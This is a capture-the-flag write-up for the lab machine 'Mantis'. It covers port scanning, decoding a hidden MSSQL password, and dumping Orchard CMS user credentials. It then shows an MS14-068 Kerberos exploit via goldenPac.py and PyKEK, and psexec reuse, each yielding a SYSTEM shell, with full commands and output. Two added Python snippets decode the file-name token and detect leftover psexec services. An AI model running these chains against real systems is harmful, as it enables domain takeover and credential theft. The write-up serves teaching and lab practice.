Mantis write-up
Analysis of Mantis
Enumeration
Port scanning
TCP ports
We scan the full range of TCP ports using nmap:
$ sudo nmap -T4 -A -p- 10.10.10.52
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2017-09-17 08:05:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
738/tcp filtered unknown
1337/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
1361/tcp filtered linx
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2017-09-16T19:03:50
|_Not valid after: 2047-09-16T19:03:50
|_ssl-date: 2017-09-17T08:06:17+00:00; +2s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3734/tcp filtered synel-data
4461/tcp filtered unknown
5722/tcp open msrpc Microsoft Windows RPC
7511/tcp filtered pafec-lm
8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
9389/tcp open mc-nmf .NET Message Framing
9484/tcp filtered unknown
9725/tcp filtered unknown
11126/tcp filtered unknown
11628/tcp filtered unknown
13100/tcp filtered unknown
13703/tcp filtered unknown
19797/tcp filtered unknown
29664/tcp filtered unknown
34288/tcp filtered unknown
35536/tcp filtered unknown
37108/tcp filtered unknown
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
49289/tcp filtered unknown
50010/tcp open msrpc Microsoft Windows RPC
50017/tcp open msrpc Microsoft Windows RPC
50255/tcp open unknown
53029/tcp filtered unknown
55718/tcp filtered unknown
56870/tcp filtered unknown
57167/tcp filtered unknown
No exact OS matches for host
Network Distance: 2 hops
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| ms-sql-info:
| 10.10.10.52:1433:
| Version:
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: mantis.htb.local
|_ System time: 2017-09-17T04:06:21-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_smbv2-enabled: Server supports SMBv2 protocol
UDP ports
We scan only the 1000 most common UDP ports using nmap (because UDP scanning is too slow):
$ sudo nmap -T4 -sU -A --top-ports=1000 10.10.10.52
PORT STATE SERVICE VERSION
9/udp open|filtered discard
53/udp open domain Microsoft DNS
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/udp open kerberos-sec Microsoft Windows Kerberos (server time: 2017-09-17 08:47:35Z)
123/udp open ntp NTP v3
| ntp-info:
|_
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
389/udp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
464/udp open|filtered kpasswd5
500/udp open|filtered isakmp
4500/udp open|filtered nat-t-ike
5355/udp open|filtered llmnr
17146/udp open|filtered unknown
20359/udp open|filtered unknown
20742/udp open|filtered unknown
32771/udp open|filtered sometimes-rpc6
49198/udp open|filtered unknown
52144/udp open domain Zoom X5 ADSL modem DNS
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
52225/udp open domain Microsoft DNS
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
52503/udp open domain Microsoft DNS
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
53006/udp open domain Microsoft DNS
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
53037/udp open domain Microsoft DNS
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
53571/udp open domain Microsoft DNS
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
53589/udp open domain Microsoft DNS
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
53838/udp open domain Microsoft DNS
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
54094/udp open domain Microsoft DNS
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
54114/udp open domain Microsoft DNS
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
54281/udp open domain Microsoft DNS
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
54321/udp open domain Microsoft DNS
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
Too many fingerprints match this host to give specific OS details
Service Info: Host: MANTIS; OS: Windows; Device: broadband router; CPE: cpe:/o:microsoft:windows_server, cpe:/o:microsoft:windows, cpe:/h:zoom:x5
Host script results:
|_clock-skew: mean: 8s, deviation: 0s, median: 8s
Brute forcing directories and files
Port 1337
$ dirsearch -u http://10.10.10.52:1337 -w /opt/DirBuster/directory-list-2.3-medium.txt -e asp
Extensions: asp | Threads: 10 | Wordlist size: 220521
Target: http://10.10.10.52:1337
[09:17:59] Starting:
[09:18:00] 200 - 689B - /
[09:30:17] 500 - 3KB - /orchard
[10:06:05] 301 - 160B - /secure_notes -> http://10.10.10.52:1337/secure_notes/
Port 8080
$ dirsearch -u http://10.10.10.52:8080 -w /opt/DirBuster/directory-list-2.3-medium.txt -e asp
Target: http://10.10.10.52:8080
[10:14:28] Starting:
[10:14:50] 200 - 6KB - /
[10:15:13] 200 - 3KB - /archive
[10:16:15] 200 - 3KB - /blogs
[10:17:07] 302 - 163B - /admin -> /Users/Account/AccessDenied?ReturnUrl=%2Fadmin
[10:21:05] 200 - 2KB - /tags
[10:27:23] 200 - 3KB - /Archive
[10:32:18] 200 - 3KB - /pollArchive
[10:40:06] 200 - 3KB - /Blogs
[10:45:24] 200 - 3KB - /newsarchive
[10:54:36] 200 - 3KB - /news_archive
[11:18:17] 302 - 163B - /Admin -> /Users/Account/AccessDenied?ReturnUrl=%2FAdmin
Let’s visit http://10.10.10.52:1337/secure_notes/
10.10.10.52 - /secure_notes/
[To Parent Directory]
9/13/2017 4:22 PM 912 dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt
9/1/2017 9:13 AM 168 web.config
The dev_notes file contains the following installation notes:
1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.
The filename dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt seems to contain some base64-encoded text. Let’s explore it:
$ echo NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx | base64 -d
6d2424716c5f53405f504073735730726421
This seems like a hex string. Let’s convert it to ASCII:
$ echo 6d2424716c5f53405f504073735730726421 | xxd -r -p
m$$ql_S@_P@ssW0rd!
Bingo! We found what looks like an MSSQL password (the notes above mention a SQL Server user "admin"). Let’s test it using the username “admin”.
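As an added example (not code from the original write-up), a small Python decoder that peels the base64 and then hex layers off a dev_notes_<token>.txt.txt file name, stopping when the result is no longer printable text; the file-name regex and the stop rule are my assumptions:

```python
import base64
import binascii
import re
from typing import List, Optional

# Added example, not from the original write-up: peel the base64 -> hex
# -> ASCII layers out of a name such as dev_notes_<token>.txt.txt.
TOKEN_RE = re.compile(r"^dev_notes_(?P<token>[A-Za-z0-9+/=]+)(?:\.txt)+$")


def extract_token(filename: str) -> Optional[str]:
    """Return the encoded token embedded in a dev_notes_*.txt file name."""
    m = TOKEN_RE.match(filename)
    return m.group("token") if m else None


def _try_hex(s: str) -> Optional[str]:
    # Hex is checked first: an even-length hex string often passes a base64
    # check as well, but the reverse is not true.
    if len(s) % 2 or not re.fullmatch(r"[0-9a-fA-F]+", s):
        return None
    try:
        return bytes.fromhex(s).decode("ascii")
    except UnicodeDecodeError:
        return None


def _try_base64(s: str) -> Optional[str]:
    # Restore any missing '=' padding, then require canonical base64.
    padded = s + "=" * (-len(s) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None


def decode_layers(token: str, max_depth: int = 5) -> List[str]:
    """Decode repeatedly; returns [token, layer1, ...], innermost last."""
    layers = [token]
    current = token
    for _ in range(max_depth):
        decoded = _try_hex(current)
        if decoded is None:
            decoded = _try_base64(current)
        # Stop when nothing decodes or the result is no longer printable text.
        if not decoded or not decoded.isprintable():
            break
        layers.append(decoded)
        current = decoded
    return layers


if __name__ == "__main__":
    name = "dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt"
    print(" -> ".join(decode_layers(extract_token(name))))
```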
Exploring MSSQL databases
Using Impacket (mssqlclient.py)
$ mssqlclient.py -p 1433 admin:m\$\$ql_S@_P@ssW0rd\!@10.10.10.52
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208)
[!] Press help for extra shell commands
SQL> SELECT name FROM master.dbo.sysdatabases
master
tempdb
model
msdb
orcharddb
SQL> SELECT COLUMN_NAME 'All_Columns' FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='User'
blog_Orchard_Users_UserPartRecord
blog_Orchard_Roles_UserRolesPartRecord
SQL> use orcharddb
SQL> SELECT COLUMN_NAME 'All_Columns' FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='blog_Orchard_Users_UserPartRecord '
Id
UserName
Email
NormalizedUserName
Password
PasswordFormat
HashAlgorithm
PasswordSalt
RegistrationStatus
EmailStatus
EmailChallengeToken
CreatedUtc
LastLoginUtc
LastLogoutUtc
SQL> select UserName,Password from blog_Orchard_Users_UserPartRecord
admin
AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A==
James
J@m3s_P@ssW0rd!
Using Metasploit
$ msfconsole
msf > use auxiliary/admin/mssql/mssql_findandsampledata
msf auxiliary(mssql_findandsampledata) > set USERNAME admin
msf auxiliary(mssql_findandsampledata) > set PASSWORD m$$ql_S@_P@ssW0rd!
msf auxiliary(mssql_findandsampledata) > set SAMPLE_SIZE 10
Name Current Setting Required Description
---- --------------- -------- -----------
KEYWORDS passw|credit|card yes Keywords to search for
PASSWORD m$$ql_S@_P@ssW0rd! no The password for the specified username
RHOSTS 10.10.10.52 yes The target address range or CIDR identifier
RPORT 1433 yes The target port (TCP)
SAMPLE_SIZE 10 yes Number of rows to sample
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
THREADS 1 yes The number of concurrent threads
USERNAME admin no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
msf auxiliary(mssql_findandsampledata) > exploit
[*] 10.10.10.52:1433 - Attempting to connect to the SQL Server at 10.10.10.52:1433...
[*] 10.10.10.52:1433 - Successfully connected to 10.10.10.52:1433
[*] 10.10.10.52:1433 - Attempting to retrieve data ...
[*] 10.10.10.52:1433 - MANTIS\\SQLEXPRESS, orcharddb, ..., Password, nvarchar, AL1337E2D6YHm0iIysVzG8LA76Oozg
[*] 10.10.10.52:1433 - MANTIS\\SQLEXPRESS, orcharddb, ..., Password, nvarchar, J@m3s_P@ssW0rd!
[*] 10.10.10.52:1433 - MANTIS\\SQLEXPRESS, orcharddb, ..., PasswordSalt, nvarchar, NA
[*] 10.10.10.52:1433 - MANTIS\\SQLEXPRESS, orcharddb, ..., PasswordSalt, nvarchar, UBwWF1CQCsaGc/P7jIR/kg==
[*] 10.10.10.52:1433 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Exploiting Kerberos
We have found a set of domain credentials (james:J@m3s_P@ssW0rd!) in the MSSQL orcharddb database. Let’s use them to exploit the domain controller’s Kerberos service (MS14-068):
Using Impacket (goldenPac.py)
Add these lines to /etc/hosts:
10.10.10.52 mantis.htb.local
10.10.10.52 htb.local
Now let’s run goldenPac.py:
$ goldenPac.py htb.local/james:J@m3s_P@ssW0rd\!@mantis.htb.local
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file hgjtJStu.exe
[*] Opening SVCManager on mantis.htb.local.....
[*] Creating service rQic on mantis.htb.local.....
[*] Starting service rQic.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
Using PyKEK, i.e. the Python Kerberos Exploitation Kit (ms14-068.py)
Add these lines to /etc/hosts:
10.10.10.52 mantis.htb.local
10.10.10.52 htb.local
Add this line to /etc/resolv.conf:
nameserver 10.10.10.52
Get USER_SID using rpcclient:
$ rpcclient -U james 10.10.10.52
Enter james's password: J@m3s_P@ssW0rd!
rpcclient $> lookupnames james
james S-1-5-21-4220043660-4019079961-2895681657-1103
Create the ticket and copy it into the proper location:
$ git clone https://github.com/bidord/pykek && cd pykek
$ python2 ms14-068.py -u james@htb.local -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d mantis.htb.local
Password:J@m3s_P@ssW0rd!
$ cp TGT_james@htb.local.ccache /tmp/krb5cc_$(echo $UID)
Connect using smbclient:
$ smbclient -k -U james \\\\mantis.htb.local\\C$
OS=[Windows Server 2008 R2 Standard 7601 Service Pack 1] Server=[Windows Server 2008 R2 Standard 6.1]
smb: \> more \USERS\Administrator\DESKTOP\root.txt
209dc756ee5c09a9967540fe18d15567
A word of advice
If Kerberos does not work as expected, make sure that you have added the proper lines to /etc/hosts and /etc/resolv.conf (and, of course, check the Kerberos configuration files if you use them). Notice that kinit needs the realm in UPPERCASE letters in order to work: Kerberos realm names are case-sensitive, and an Active Directory realm is the uppercase form of its DNS domain name. Compare the following results:
$ kinit -V james@htb.local
Using default cache: /tmp/krb5cc_1000
Using principal: james@htb.local
Password for james@htb.local: J@m3s_P@ssW0rd!
kinit: KDC reply did not match expectations while getting initial credentials
$ kinit -V james@HTB.LOCAL
Using default cache: /tmp/krb5cc_1000
Using principal: james@HTB.LOCAL
Password for james@HTB.LOCAL: J@m3s_P@ssW0rd!
Authenticated to Kerberos v5
BONUS: Exploitation using left behind services
Look Mom! No need for a Kerberos exploit! :D
$ psexec.py htb.local/james:J@m3s_P@ssW0rd\!@mantis.htb.local
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies
[*] Trying protocol 445/SMB...
[*] Requesting shares on mantis.htb.local.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
[*] Uploading file VdYFkBHZ.exe
[-] Error uploading file VdYFkBHZ.exe, aborting.....
[-] Error performing the installation, cleaning up: 'NoneType' object has no attribute 'split'
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
We got some errors, but it worked! Maybe we have access to a writable share after all…
$ smbmap.py -u james -p J@m3s_P@ssW0rd\! -H mantis.htb.local
[+] Finding open SMB ports....
[+] User SMB session establishd on mantis.htb.local...
[+] IP: mantis.htb.local:445 Name: mantis.htb.local
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
C$ NO ACCESS
IPC$ NO ACCESS
NETLOGON READ ONLY
SYSVOL READ ONLY
No, we don’t have access to any writable share. This is very strange: how did we get an nt authority\system shell? I decided to open an issue on GitHub: https://github.com/CoreSecurity/impacket/issues/346
It seems that psexec.py is connecting to a previous RemComSvc instance that is still running on the target system. The writable share is only needed for copying the RemComSvc Windows service file. Once it is running, all communication is done through Windows named pipes.
I changed the password for the administrator account to make it easier to explore the issue:
C:\Windows\system32> net user Administrator P@ssw0rd
We can use Impacket (services.py) to list the services and look for the ones left behind by psexec.py: their names consist of four random uppercase letters, their executable is named with eight random mixed-case letters, and its path is directly inside C:\Windows\:
$ services.py htb.local/administrator:P@ssw0rd@mantis.htb.local list
...
IHXM - IHXM - RUNNING
...
TZZW - TZZW - RUNNING
...
$ services.py htb.local/administrator:P@ssw0rd@mantis.htb.local config -name IHXM
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies
[*] Trying protocol 445/SMB...
[*] Querying service config for IHXM
TYPE : 16 - SERVICE_WIN32_OWN_PROCESS
START_TYPE : 2 - AUTO START
ERROR_CONTROL : 0 - IGNORE
BINARY_PATH_NAME : C:\Windows\dZEyLGVN.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : IHXM
DEPENDENCIES : /
$ services.py htb.local/administrator:P@ssw0rd@mantis.htb.local config -name TZZW
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies
[*] Trying protocol 445/SMB...
[*] Querying service config for TZZW
TYPE : 16 - SERVICE_WIN32_OWN_PROCESS
START_TYPE : 2 - AUTO START
ERROR_CONTROL : 0 - IGNORE
BINARY_PATH_NAME : C:\Windows\EfuIvklz.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : TZZW
DEPENDENCIES : /
SERVICE_START_NAME: LocalSystem
Now, let’s try to stop those two services and check if psexec still works as before:
$ services.py htb.local/administrator:P@ssw0rd@mantis.htb.local stop -name IHXM
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies
[*] Trying protocol 445/SMB...
[*] Stopping service IHXM
$ services.py htb.local/administrator:P@ssw0rd@mantis.htb.local stop -name TZZW
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies
[*] Trying protocol 445/SMB...
[*] Stopping service TZZW
$ psexec.py htb.local/james:J@m3s_P@ssW0rd\!@mantis.htb.local
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies
[*] Trying protocol 445/SMB...
[*] Requesting shares on mantis.htb.local.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
[*] Uploading file ysSjUyKc.exe
[-] Error uploading file ysSjUyKc.exe, aborting.....
[-] Error performing the installation, cleaning up: 'NoneType' object has no attribute 'split'
Yup, it doesn’t work anymore. This confirms that those two services were responsible for the previous behaviour. But how were those services installed on the box in the first place? I don’t know. Probably some pentester tried to use psexec.py during the testing phase; if the tool’s clean-up phase failed for any reason, it left those services behind.
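As an added example (not code from the write-up or from Impacket), a detection helper that parses services.py-style "config" output and flags services matching the remnant pattern described above, so an administrator can spot leftover RemComSvc instances before someone else reuses them; the sample entries are constructed, and the two regexes encode the naming rule as an assumption:

```python
import re
from typing import Dict, List

# Added example, not from the write-up or Impacket: flag services whose name
# and binary match the remnant pattern (4 uppercase letters; an 8-letter
# mixed-case .exe directly under C:\Windows\). Regexes are my assumption.
SERVICE_NAME_RE = re.compile(r"^[A-Z]{4}$")
BINARY_PATH_RE = re.compile(r"^C:\\Windows\\[A-Za-z]{8}\.exe$", re.IGNORECASE)


def parse_service_config(text: str) -> Dict[str, str]:
    """Turn 'KEY : value' lines (services.py 'config' style) into a dict."""
    cfg: Dict[str, str] = {}
    for line in text.splitlines():
        if line.startswith("[*] Querying service config for "):
            cfg["SERVICE_NAME"] = line.rsplit(" ", 1)[1]  # real service name
            continue
        if ":" not in line:
            continue  # banner and status lines carry no key/value pair
        key, _, value = line.partition(":")
        cfg[key.strip()] = value.strip()
    return cfg


def is_psexec_remnant(name: str, binary_path: str) -> bool:
    """True when both the service name and its binary look auto-generated."""
    path = binary_path.strip().strip('"')  # sc.exe may quote the path
    return bool(SERVICE_NAME_RE.match(name) and BINARY_PATH_RE.match(path))


def find_remnants(configs: List[str]) -> List[Dict[str, str]]:
    """Return name/binary/start type for every config matching the pattern."""
    hits = []
    for text in configs:
        cfg = parse_service_config(text)
        name = cfg.get("SERVICE_NAME", cfg.get("DISPLAY_NAME", ""))
        path = cfg.get("BINARY_PATH_NAME", "")
        if is_psexec_remnant(name, path):
            hits.append({"name": name, "binary": path,
                         "start_type": cfg.get("START_TYPE", "")})
    return hits


# Constructed sample input: one entry shaped like the write-up's IHXM output,
# one ordinary Windows service for contrast.
SAMPLE_CONFIGS = [
    "[*] Querying service config for IHXM\n"
    "START_TYPE : 2 - AUTO START\n"
    "BINARY_PATH_NAME : C:\\Windows\\dZEyLGVN.exe\n"
    "DISPLAY_NAME : IHXM",
    "[*] Querying service config for Spooler\n"
    "START_TYPE : 2 - AUTO START\n"
    "BINARY_PATH_NAME : C:\\Windows\\System32\\spoolsv.exe\n"
    "DISPLAY_NAME : Print Spooler",
]
```

Running find_remnants(SAMPLE_CONFIGS) returns only the IHXM entry; the same check works on "sc qc" output once its "KEY : value" lines are fed to parse_service_config.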